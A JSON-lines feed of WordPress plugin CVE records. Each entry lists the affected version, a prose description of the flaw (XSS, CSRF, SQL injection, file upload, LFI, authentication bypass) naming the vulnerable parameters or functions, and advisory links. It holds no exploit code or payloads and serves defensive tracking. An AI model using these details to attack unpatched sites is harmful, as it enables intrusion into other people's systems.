{"CVE_ID":"CVE-2024-43268","slug":"wp-backitup","versionImpact":"1.50","description":"Access Control vulnerability in WPBackItUp Backup and Restore WordPress allows .\n\nThis issue affects Backup and Restore WordPress: from n\/a through 1.50.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-backitup\\\/wordpress-backup-and-restore-wordpress-plugin-1-50-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-backitup\\\/wordpress-backup-and-restore-wordpress-plugin-1-50-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11428","slug":"lazy-load-videos-and-sticky-control","versionImpact":"3.0.0","description":"The Lazy load videos and sticky control plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'lazy-load-videos-and-sticky-control' shortcode in all versions up to, and including, 3.0.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lazy-load-videos-and-sticky-control\\\/trunk\\\/inc\\\/classes\\\/class-lazy-load-videos-and-sticky-control-shortcode.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lazy-load-videos-and-sticky-control\\\/trunk\\\/inc\\\/classes\\\/class-lazy-load-videos-and-sticky-control-shortcode.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/lazy-load-videos-and-sticky-control\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/lazy-load-videos-and-sticky-control\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3a9715c3-6ce0-46f8-820d-194bd0e8e6fd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3a9715c3-6ce0-46f8-820d-194bd0e8e6fd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12261","slug":"smartemailing","versionImpact":"2.2.0","description":"The SmartEmailing.cz plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'se-lists-updated' parameter in all versions up to, and including, 2.2.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/smartemailing\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/smartemailing\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7332c21a-3501-4066-b7b7-34914a228d8f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7332c21a-3501-4066-b7b7-34914a228d8f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13586","slug":"masy-gallery","versionImpact":"1.7","description":"The Masy Gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'justified-gallery' shortcode in all versions up to, and including, 1.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/masy-gallery\\\/trunk\\\/inc\\\/masygal-justified-shortcode.php#L33\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/masy-gallery\\\/trunk\\\/inc\\\/masygal-justified-shortcode.php#L33\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b865df96-335c-4856-a5e5-e728fb0645d3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b865df96-335c-4856-a5e5-e728fb0645d3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2106","slug":"arielbrailovsky-viralad","versionImpact":"1.0.8","description":"The ArielBrailovsky-ViralAd plugin for WordPress is vulnerable to SQL Injection via the 'text' and 'id' parameters of the limpia() function in all versions up to, and including, 1.0.8 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. This only appears to be exploitable on very old versions of WordPress.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/arielbrailovsky-viralad\\\/trunk\\\/inc\\\/anuncio.php#L174\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/arielbrailovsky-viralad\\\/trunk\\\/inc\\\/anuncio.php#L174\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/arielbrailovsky-viralad\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/arielbrailovsky-viralad\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/60cd2178-858e-4e24-8967-13b04f675d2d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/60cd2178-858e-4e24-8967-13b04f675d2d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11221","slug":"full-screen-page-background-image-slideshow","versionImpact":"1.1","description":"The Full Screen (Page) Background Image Slideshow WordPress plugin through 1.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/810c2c94-5d35-419c-a993-07a0c7064ce6\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/810c2c94-5d35-419c-a993-07a0c7064ce6\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6079","slug":"school-management","versionImpact":"93.2.0","description":"The School Management System for Wordpress plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the homework.php file in all versions up to, and including, 93.2.0. This makes it possible for authenticated attackers, with Student-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/school-management-system-for-wordpress\\\/11470032\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/school-management-system-for-wordpress\\\/11470032\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d872ec33-6284-495c-b894-41fe7b40b63c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d872ec33-6284-495c-b894-41fe7b40b63c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4550","slug":"user-activity","versionImpact":"1.0.1","description":"The User Activity WordPress plugin through 1.0.1 checks headers such as the X-Forwarded-For to retrieve the IP address of the request, which could lead to IP spoofing","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a1179959-2044-479f-a5ca-3c9ffc46d00e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a1179959-2044-479f-a5ca-3c9ffc46d00e\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3162","slug":"payment-gateway-stripe-and-woocommerce-integration","versionImpact":"3.7.7","description":"The Stripe Payment Plugin for WooCommerce plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 3.7.7. This is due to insufficient verification on the user being supplied during a Stripe checkout through the plugin. This allows unauthenticated attackers to log in as users who have orders, who are typically customers.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2925361\\\/payment-gateway-stripe-and-woocommerce-integration\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2925361\\\/payment-gateway-stripe-and-woocommerce-integration\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/payment-gateway-stripe-and-woocommerce-integration\\\/tags\\\/3.7.7\\\/includes\\\/class-stripe-checkout.php#L640\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/payment-gateway-stripe-and-woocommerce-integration\\\/tags\\\/3.7.7\\\/includes\\\/class-stripe-checkout.php#L640\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d052f3e-8554-43f0-a5ae-1de09c198d7b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d052f3e-8554-43f0-a5ae-1de09c198d7b?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3590","slug":"letterpress","versionImpact":"1.2.2","description":"The LetterPress WordPress plugin through 1.2.2 does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks, such as delete arbitrary subscribers","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/829f4d40-e5b0-4009-b753-85ca2a5b3d25\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/829f4d40-e5b0-4009-b753-85ca2a5b3d25\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4427","slug":"comparison-slider","versionImpact":"1.0.5","description":"The Comparison Slider plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on several AJAX actions in all versions up to, and including, 1.0.5. This makes it possible for authenticated attackers, with subscriber access or above, to change plugin settings and perform other actions such as deleting sliders.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ab68a08d-a6d4-4424-a7bf-219951f752fa?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ab68a08d-a6d4-4424-a7bf-219951f752fa?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/comparison-slider\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/comparison-slider\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5155","slug":"inquiry-cart","versionImpact":"3.4.2","description":"The Inquiry cart WordPress plugin through 3.4.2 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f1e90a8a-d959-4316-a5d4-e183854944bd\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f1e90a8a-d959-4316-a5d4-e183854944bd\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5993","slug":"cliengo","versionImpact":"3.0.1","description":"The Cliengo \u2013 Chatbot plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'update_session' function in all versions up to, and including, 3.0.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update the session token of the chatbot.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0a13e87d-51cd-43b0-a658-900a174738fc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0a13e87d-51cd-43b0-a658-900a174738fc?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cliengo\\\/trunk\\\/admin\\\/class-cliengo-form.php#L109\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cliengo\\\/trunk\\\/admin\\\/class-cliengo-form.php#L109\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6520","slug":"fluentform","versionImpact":"5.1.19","description":"The Contact Form Plugin by Fluent Forms for Quiz, Survey, and Drag & Drop WP Form Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 5.1.19 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0a30d35c-9883-4b0f-83a2-494401c45d8e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0a30d35c-9883-4b0f-83a2-494401c45d8e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/fluentform\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/fluentform\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3125227\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3125227\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11424","slug":"slick-sitemap","versionImpact":"2.0.0","description":"The Slick Sitemap plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'slick-sitemap' shortcode in all versions up to, and including, 2.0.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/slick-sitemap\\\/trunk\\\/slick-sitemap.php#L95\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/slick-sitemap\\\/trunk\\\/slick-sitemap.php#L95\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/slick-sitemap\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/slick-sitemap\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a2495fd6-5a36-4bdf-b4e0-68095072d820?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a2495fd6-5a36-4bdf-b4e0-68095072d820?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11444","slug":"cluevo-lms","versionImpact":"1.13.2","description":"The CLUEVO LMS, E-Learning Platform plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.13.2. This is due to missing or incorrect nonce validation on the cluevo_render_module_ui() function. This makes it possible for unauthenticated attackers to delete modules via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cluevo-lms\\\/tags\\\/1.13.2\\\/functions\\\/functions.module-management.inc.php#L925\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cluevo-lms\\\/tags\\\/1.13.2\\\/functions\\\/functions.module-management.inc.php#L925\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cluevo-lms\\\/tags\\\/1.13.2\\\/functions\\\/functions.module-management.inc.php#L928\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cluevo-lms\\\/tags\\\/1.13.2\\\/functions\\\/functions.module-management.inc.php#L928\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2a3056d4-5ee9-4b31-9ef8-0e55f470ad23?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2a3056d4-5ee9-4b31-9ef8-0e55f470ad23?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12220","slug":"wc-sms","versionImpact":"2.8.1","description":"The SMS for WooCommerce plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.8.1. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3207316\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3207316\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wc-sms\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wc-sms\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/35707e4e-ca67-43fe-b120-79101ef31155?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/35707e4e-ca67-43fe-b120-79101ef31155?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12073","slug":"meteor-slides","versionImpact":"1.5.7","description":"The Meteor Slides plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'slide_url_value' parameter in all versions up to, and including, 1.5.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/meteor-slides\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/meteor-slides\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be913494-f4a7-4718-ac2b-da4baf2b0a21?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be913494-f4a7-4718-ac2b-da4baf2b0a21?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13551","slug":"abc-notation","versionImpact":"6.1.3","description":"The ABC Notation plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'abcjs' shortcode in all versions up to, and including, 6.1.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/abc-notation\\\/tags\\\/6.1.3\\\/abc-notation.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/abc-notation\\\/tags\\\/6.1.3\\\/abc-notation.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e10930fd-fae0-4554-acf3-da81a124f79d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e10930fd-fae0-4554-acf3-da81a124f79d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1559","slug":"cc-img-shortcode","versionImpact":"1.1.0","description":"The CC-IMG-Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'img' shortcode in all versions up to, and including, 1.1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cc-img-shortcode\\\/trunk\\\/includes\\\/class-img-shortcode.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cc-img-shortcode\\\/trunk\\\/includes\\\/class-img-shortcode.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cc-img-shortcode\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cc-img-shortcode\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/81803a24-51ba-4d23-88ef-553cb4754977?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/81803a24-51ba-4d23-88ef-553cb4754977?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3099","slug":"advanced-search-by-my-solr-server","versionImpact":"2.0.5","description":"The Advanced Search by My Solr Server plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.0.5. This is due to missing or incorrect nonce validation on the 'MySolrServerSettings' page. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-search-by-my-solr-server\\\/tags\\\/2.0.5\\\/advanced-search-by-my-solr-server.inc.php#L66\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-search-by-my-solr-server\\\/tags\\\/2.0.5\\\/advanced-search-by-my-solr-server.inc.php#L66\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-search-by-my-solr-server\\\/tags\\\/2.0.5\\\/advanced-search-by-my-solr-server.php#L1008\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-search-by-my-solr-server\\\/tags\\\/2.0.5\\\/advanced-search-by-my-solr-server.php#L1008\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-search-by-my-solr-server\\\/tags\\\/2.0.5\\\/advanced-search-by-my-solr-server-options-page.php#L76\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-search-by-my-solr-server\\\/tags\\\/2.0.5\\\/advanced-search-by-my-solr-server-options-page.php#L76\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/advanced-search-by-my-solr-server\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/advanced-search-by-my-solr-server\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/250d1bea-793d-4c13-976b-bfc3ff7d9160?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/250d1bea-793d-4c13-976b-bfc3ff7d9160?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11190","slug":"jwp-a11y","versionImpact":"4.1.7","description":"The jwp-a11y WordPress plugin through 4.1.7 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/66b914ba-4253-4849-a38a-05ab246a9a32\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/66b914ba-4253-4849-a38a-05ab246a9a32\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3671","slug":"gym-management","versionImpact":"67.7.0","description":"The WPGYM - Wordpress Gym Management System plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 67.7.0 via the 'page' parameter. This makes it possible for authenticated attackers, with Subscriber-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included. The Local File Inclusion exploit can be chained to include various dashboard view files in the plugin. One in particular reported by the researcher can be leveraged to update the password of Super Administrator accounts in Multisite environments making privilege escalation possible.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/-wpgym-wordpress-gym-management-system\\\/13352964\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/-wpgym-wordpress-gym-management-system\\\/13352964\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6536d19f-a042-4404-b0c9-91aacd7768f7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6536d19f-a042-4404-b0c9-91aacd7768f7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-43459","slug":"captainform","versionImpact":"2.5.3","description":"Cross-Site Request Forgery (CSRF) vulnerability in Forms by CaptainForm \u2013 Form Builder for WordPress plugin <= 2.5.3 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/captainform\\\/wordpress-forms-by-captainform-2-5-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/captainform\\\/wordpress-forms-by-captainform-2-5-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2354","slug":"chp-ads-block-detector","versionImpact":"3.9.4","description":"The CHP Ads Block Detector plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings reachable through an AJAX action in versions up to, and including, 3.9.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6f8514c9-0e11-4e26-ba0b-1d08a990b56c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6f8514c9-0e11-4e26-ba0b-1d08a990b56c?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2926660\\\/chp-ads-block-detector\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2926660\\\/chp-ads-block-detector\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2920522\\\/chp-ads-block-detector\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2920522\\\/chp-ads-block-detector\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2922313\\\/chp-ads-block-detector\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2922313\\\/chp-ads-block-detector\",\"refsource\":\"MISC\",\"tags\":[]}]